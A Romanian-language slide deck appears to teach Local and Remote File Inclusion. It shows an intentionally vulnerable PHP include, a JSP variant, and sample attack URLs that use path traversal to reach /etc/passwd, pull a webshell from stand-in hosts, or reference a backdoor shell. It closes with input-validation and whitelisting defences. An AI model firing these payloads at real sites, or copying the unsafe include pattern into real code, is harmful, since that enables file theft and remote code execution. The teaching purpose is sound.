LFI & RFI

Local File Inclusion
Remote File Inclusion
Vulnerabilitate web (21%)
Includere fisiere prin parametri
Accesare neautorizata de fisiere
Executare cod malitios pe host

Interogare vulnerabila

http://www.site.com/pagina/vulnerabila?include=fisier

fisier - ii este inclus continutul in pagina
un model gresit
nu se fac suficiente verificari

Interogare vulnerabila

<?php
   if ( isset( $_GET['language'] ) ) {
      include( $_GET['language'] . '.php' );
   }
?>

/vulnerable.php?language=FISIER

<form method="get">
   <select name="language">
      <option value="english">English</option>
      <option value="french">French</option>
      ...
   </select>
   <input type="submit">
</form>

Interogare vulnerabila

/vulnerable.php?language=FISIER
/vulnerable.php?language=http://evil.example.com/webshell.txt?
/vulnerable.php?language=C:\\ftp\\upload\\exploit
/vulnerable.php?language=C:\\notes.txt%00
/vulnerable.php?language=../../../../../etc/passwd%00

Citire neautorizata

/etc/passwd (%00)
web server cu acces de root
/etc/shadow
/var/log
fisiere exploit locale

Executie shell

includere exploit remote
http://www.hacker.com/backdoor_shell.php (%00)
R57 shell

Exemplu artificial

server local in Python
vulnerabilitate expusa in mod voit
exemplu in PHP

Alte limbaje

<jsp:include page=”<%=(String)
request.getParmeter(“ParamName”)%>”>

Protectie

sanitizare parametri/input
- GET/POST
- query
- cookies
- headers
validari client si server side
whitelist pe extensie si format (PDF, DOC, JPG)
verificari dimensiune

Sfarsit

Multumim!

Made with Slides.com